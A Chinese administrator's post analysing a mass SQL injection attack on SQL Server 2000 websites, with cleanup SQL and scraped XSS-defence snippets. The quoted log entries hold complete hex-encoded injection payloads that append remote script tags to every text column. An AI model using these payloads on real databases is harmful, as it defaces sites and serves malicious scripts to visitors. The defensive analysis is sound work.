近期客户网站遭遇JS木马病毒攻击,一般攻击的是SQL SERVER 2000数据库。
其源码如下:
攻击:第一次的时候什么大侠123来着忘记了,这次呢又是这个!~~~
<script src=http://3bom%62%2Ecom/c.js></script>
呵呵 看来并非SQL POST 或者 GET 注入了 ,因为我已经将SQL一般注入防止了。
我们看看网站日志:
2008年12月28日 ex081228.log 数据日志:
异常信息:
activity_view.asp key=3%3B%44%65%43%4C%61%52%45%20%40%53%20%4E%76%41%72%43%48%61%52%28%34%30%30%30%29%3B%53%65%54%20%40%53%3D%43%61%53%74%28%30%78%34%34%30%30%36%35%30%30%36%33%30%30%36%43%30%30%36%31%30%30%37%32%30%30%36%35%30%30%32%30%30%30%34%30%30%30%35%34%30%30%32%30%30%30%35%36%30%30%36%31%30%30%37%32%30%30%36%33%30%30%36%38%30%30%36%31%30%30%37%32%30%30%32%38%30%30%33%32%30%30%33%35%30%30%33%35%30%30%32%39%30%30%32%43%30%30%34%30%30%30%34%33%30%30%32%30%30%30%35%36%30%30%36%31%30%30%37%32%30%30%36%33%30%30%36%38%30%30%36%31%30%30%37%32%30%30%32%38%30%30%33%32%30%30%33%35%30%30%33%35%30%30%32%39%30%30%32%30%30%30%34%34%30%30%36%35%30%30%36%33%30%30%36%43%30%30%36%31%30%30%37%32%30%30%36%35%30%30%32%30%30%30%35%34%30%30%36%31%30%30%36%32%30%30%36%43%30%30%36%35%30%30%35%46%30%30%34%33%30%30%37%35%30%30%37%32%30%30%37%33%30%30%36%46%30%30%37%32%30%30%32%30%30%30%34%33%30%30%37%35%30%30%37%32%30%30%37%33%30%30%36%46%30%30%37%32%30%30%32%30%30%30%34%36%30%30%36%46%30%30%37%32%30%30%32%30%30%30%35%33%30%30%36%35%30%30%36%43%30%30%36%35%30%30%36%33%30%30%37%34%30%30%32%30%30%30%34%31%30%30%32%45%30%30%34%45%30%30%36%31%30%30%36%44%30%30%36%35%30%30%32%43%30%30%34%32%30%30%32%45%30%30%34%45%30%30%36%31%30%30%36%44%30%30%36%35%30%30%32%30%30%30%34%36%30%30%37%32%30%30%36%46%30%30%36%44%30%30%32%30%30%30%35%33%30%30%37%39%30%30%37%33%30%30%36%46%30%30%36%32%30%30%36%41%30%30%36%35%30%30%36%33%30%30%37%34%30%30%37%33%30%30%32%30%30%30%34%31%30%30%32%43%30%30%35%33%30%30%37%39%30%30%37%33%30%30%36%33%30%30%36%46%30%30%36%43%30%30%37%35%30%30%36%44%30%30%36%45%30%30%37%33%30%30%32%30%30%30%34%32%30%30%32%30%30%30%35%37%30%30%36%38%30%30%36%35%30%30%37%32%30%30%36%35%30%30%32%30%30%30%34%31%30%30%32%45%30%30%34%39%30%30%36%34%30%30%33%44%30%30%34%32%30%30%32%45%30%30%34%39%30%30%36%34%30%30%32%30%30%30%34%31%30%30%36%45%30%30%36%34%30%30%32%30%30%30%34%31%30%30%32%45%30%30%35%38%30%30%37%34%30%30%37%39%30%30%37%30%30%30%36%35%30%30%33%44%30%30%32%37%30%30%37%35%30%30%32%37%30%30%32%30%30%30%34%31%30%30%36%45%30%30%36%34%30%30%32%30%30%30%32%38%30%30%34%32%30%30%32%45%30%30%35%38%30%30%37%34%30%30%37%39%30%30%37%30%30%30%36%35%30%30%33%44%30%30%33%39%30%30%33%39%30%30%32%30%30%30%34%46%30%30%37%32%30%30%32%30%30%30%34%32%30%30%32%45%30%30%35%38%30%30%37%34%30%30%37%39%30%30%37%30%30%30%36%35%30%30%33%44%30%30%33%33%30%30%33%35%30%30%32%30%30%30%34%46%30%30%37%32%30%30%32%30%30%30%34%32%30%30%32%45%30%30%35%38%30%30%37%34%30%30%37%39%30%30%37%30%30%30%36%35%30%30%33%44%30%30%33%32%30%30%33%33%30%30%33%31%30%30%32%30%30%30%34%46%30%30%37%32%30%30%32%30%30%30%34%32%30%30%32%45%30%30%35%38%30%30%37%34%30%30%37%39%30%30%37%30%30%30%36%35%30%30%33%44%30%30%33%31%30%30%33%36%30%30%33%37%30%30%32%39%30%30%32%30%30%30%34%46%30%30%37%30%30%30%36%35%30%30%36%45%30%30%32%30%30%30%35%34%30%30%36%31%30%30%36%32%30%30%36%43%30%30%36%35%30%30%35%46%30%30%34%33%30%30%37%35%30%30%37%32%30%30%37%33%30%30%36%46%30%30%37%32%30%30%32%30%30%30%34%36%30%30%36%35%30%30%37%34%30%30%36%33%30%30%36%38%30%30%32%30%30%30%34%45%30%30%36%35%30%30%37%38%30%30%37%34%30%30%32%30%30%30%34%36%30%30%37%32%30%30%36%46%30%30%36%44%30%30%32%30%30%30%32%30%30%30%35%34%30%30%36%31%30%30%36%32%30%30%36%43%30%30%36%35%30%30%35%46%30%30%34%33%30%30%37%35%30%30%37%32%30%30%37%33%30%30%36%46%30%30%37%32%30%30%32%30%30%30%34%39%30%30%36%45%30%30%37%34%30%30%36%46%30%30%32%30%30%30%34%30%30%30%35%34%30%30%32%43%30%30%34%30%30%30%34%33%30%30%32%30%30%30%35%37%30%30%36%38%30%30%36%39%30%30%36%43%30%30%36%35%30%30%32%38%30%30%34%30%30%30%34%30%30%30%34%36%30%30%36%35%30%30%37%34%30%30%36%33%30%30%36%38%30%30%35%46%30%30%35%33%30%30%37%34%30%30%36%31%30%30%37%34%30%30%37%35%30%30%37%33%30%30%33%44%30%30%33%30%30%30%32%39%30%30%32%30%30%30%34%32%30%30%36%35%30%30%36%37%30%30%36%39%30%30%36%45%30%30%32%30%30%30%34%35%30%30%37%38%30%30%36%35%30%30%36%33%30%30%32%38%30%30%32%37%30%30%37%35%30%30%37%30%30%30%36%34%30%30%36%31%30%30%37%34%30%30%36%35%30%30%32%30%30%30%35%42%30%30%32%37%30%30%32%42%30%30%34%30%30%30%35%34%30%30%32%42%30%30%32%37%30%30%35%44%30%30%32%30%30%30%35%33%30%30%36%35%30%30%37%34%3 -
异常信息:
/news_view.asp key=132|41|80040e07|将_varchar_值
activity_history.asp |41|80040e07|将_varchar_值_'2<script_src=http://cn.jxmmtv.com/cn.js></script><script_src=http://cn.daxia123.cn/cn.js></script>'_转换为数据类型为_int_的列时发生语法错误。 -
异常信息:
news_view.asp key=226;dEcLaRe%20@S%20VaRcHaR(4000)%20SeT%20@s=cAsT(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F636E2E64617869613132332E636E2F636E2E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20aS%20VaRcHaR(4000));eXeC(@s);--|41|80040e07|将_varchar_值_'2<script_src=http://cn.jxmmtv.com/cn.js></script><script_src=http://cn.daxia123.cn/cn.js></script>'_转换为数据类型为_int_的列时发生语法错误。 -
异常信息:
nfo_view.asp key=30%20AnD%20(sElEcT%20ChAr(94)%2BcAsT(CoUnT(1)%20aS%20VaRcHaR(100))%2bChAr(94)%20fRoM%20[mAsTeR]..[sYsDaTaBaSeS])>0 -
以上信息自己分析吧 ,这里不多讲了
下面处理数据库的SQL程序:
declare &tbName varchar(100),
&colName varchar(100),
&sql varchar(8000),
&str varchar(200),
&dd varchar(50)
declare tb cursor local for
select so.name tbName ,sc.name colName from syscolumns as sc
inner join sysobjects as so on sc.id=so.id where so.type='U' and sc.xusertype in(175,239,167,231,99,35)
open tb
fetch next from tb into &tbName,&colName
while &&fetch_status=0
begin
set &str='<script src=http://3bom%62%2Ecom/c.js>'
set &dd =''''''
set &sql='update '+&tbName+ ' set '+&colName+'=REPLACE(convert(varchar(8000),'+&colName+'),'''+&str+''','+&dd+') where '
set &sql=&sql+'patindex(''%'+&str+'%'','+&colName+')>0'
--print &sql
exec(&sql)
fetch next from tb into &tbName,&colName
end
close tb
deallocate tb
分享到:
相关推荐
5. **加强监测与响应**:建立有效的监测系统,一旦发现XSS攻击迹象,立即采取行动隔离并修复受影响的部分。 通过综合运用这些策略,企业和组织可以有效减少XSS蠕虫与病毒带来的威胁,保护用户的信息安全。 #### ...
1. 防御策略:防御XSS攻击的关键在于对用户输入进行严格的验证和过滤,确保所有用户提交的数据都被正确转义。此外,使用HTTP-only cookies可以防止会话cookie被JavaScript访问,从而降低攻击风险。内容安全策略...
DOM型XSS则涉及客户端JavaScript的DOM(文档对象模型),攻击者通过修改DOM树中的数据,导致页面上的JavaScript执行恶意代码。 XSS攻击可以做的事情非常多,几乎涵盖JavaScript能实现的所有功能: 1. **会话劫持**...
- 用户数据泄露:攻击者可以通过XSS获取用户的登录凭据、个人数据等。 - 钓鱼攻击:伪造页面,诱导用户执行操作,如点击恶意链接或提交个人信息。 - 身份冒用:利用XSS获取用户会话信息,实现对用户身份的冒用。 ...
随着计算机技术的飞速发展,信息安全问题日益凸显,尤其是计算机...同时,为了防止网络攻击和病毒入侵,还需采取必要的技术措施,包括但不限于漏洞修复、入侵检测系统部署和安全策略制定等,以保护信息系统免受攻击。
跨站脚本攻击(Cross-Site Scripting,简称XSS)是网络安全领域中常见的攻击手段之一,它利用了Web应用程序的不足,使攻击者能够注入恶意脚本到网页上,进而影响用户的安全。这种攻击方式可能导致用户数据泄露、会话...
这种攻击利用了信任关系,即用户对合法网站的信任,使得攻击者能够通过受害者的浏览器执行任意代码,从而盗取敏感数据、篡改网页或传播病毒等。 ### 二、XSS攻击的类型 XSS攻击主要分为三种类型: 1. **存储型XSS...
在IT行业中,安全是至关重要的一个领域,尤其是对于电信设备来说,它们承载着大量的通信数据,因此必须具备抵御各种攻击的能力。"电信设备-跨站攻击解决方法、移动终端及存储介质.zip"这个压缩包文件显然关注的是...
脚本入侵,也称为跨站脚本攻击(Cross-Site Scripting,简称XSS),是指攻击者在Web页面中注入恶意脚本,当用户浏览这些页面时,恶意脚本会在用户的浏览器中执行,从而盗取用户敏感信息或破坏网站功能。这种攻击方式...
这包括Web应用程序的安全,如SQL注入、跨站脚本(XSS)攻击,以及软件的授权和访问控制。未验证的用户输入、不安全的默认设置、不恰当的数据加密都可能导致数据泄露或系统被操纵。 4. 应急组织机构和职责 应急组织...
平台需要防范常见的Web攻击,如SQL注入、跨站脚本(XSS)和跨站请求伪造(CSRF)。应用防火墙(WAF)和安全编码实践对于防止这些攻击至关重要。 3. **安全防御**:安全防御体系包括预防、检测和响应机制。预防措施...
安全威胁无处不在,从传统的病毒和木马到现代的勒索软件和零日攻击,都对网络安全构成严重挑战。因此,安全对抗策略必须不断演进。这包括强化网络安全防护、实施安全培训、采用先进的安全技术和制定完善的安全政策。...
6. **蠕虫攻击**:通过邮件传播的蠕虫病毒可以自我复制并执行各种恶意行为,如发送更多邮件、查看用户的好友列表等,这在Wooyun的报告中也有提及。 7. **PC端与移动端的安全**:不仅PC端的邮箱服务存在安全隐患,...
1. Web应用安全:Web安全主要关注SQL注入、跨站脚本(XSS)、跨站请求伪造(CSRF)等常见攻击手法,逆向工程师需要掌握Web渗透测试技巧,发现并修复这些漏洞。 2. OWASP(Open Web Application Security Project)...
在部署和运行此类源码时,仍需注意定期更新、修复漏洞,防止SQL注入、XSS跨站脚本攻击等常见Web安全问题。 5. **网站功能**:一个典型的返利网可能包括以下功能: - 用户注册/登录系统:允许用户创建账户、管理...
- 跨站脚本(XSS)攻击:在网页中注入可执行的脚本,以盗取用户数据或操纵用户浏览器。 为了防范这些安全威胁,我们需要实施多层次的安全策略,包括防火墙、入侵检测系统、数据加密、身份验证、访问控制、安全更新...
WebSecurityGuard是一款专注于Web安全检测与监控的工具,它旨在帮助企业及个人用户保护其网站免受各种网络威胁,如SQL注入、跨站脚本攻击(XSS)、钓鱼攻击、恶意软件感染等。这款工具通过实时监测、深度扫描和智能...
3. **跨站脚本攻击(XSS)**:XSS允许攻击者在用户浏览器中执行恶意脚本,可能导致数据泄露、会话劫持等。防止XSS攻击的方法包括正确地编码输出、使用HTTPOnly Cookie防止会话令牌被盗,以及利用Content Security ...
它是一种模拟攻击者行为,对系统、网络或应用程序进行的授权测试,目的是发现并修复潜在的安全漏洞。渗透测试包括了多种技术,如网络扫描、漏洞利用、社会工程学等,旨在评估组织的安全防御能力。了解和掌握这些技术...
3. **XSS跨站脚本防护**:为了防止XSS攻击,系统加强了对输出内容的过滤和编码,避免攻击者通过在页面上插入恶意脚本来窃取用户信息或进行其他破坏行为。 4. **文件上传安全**:杰奇1.7增强了文件上传功能的安全性...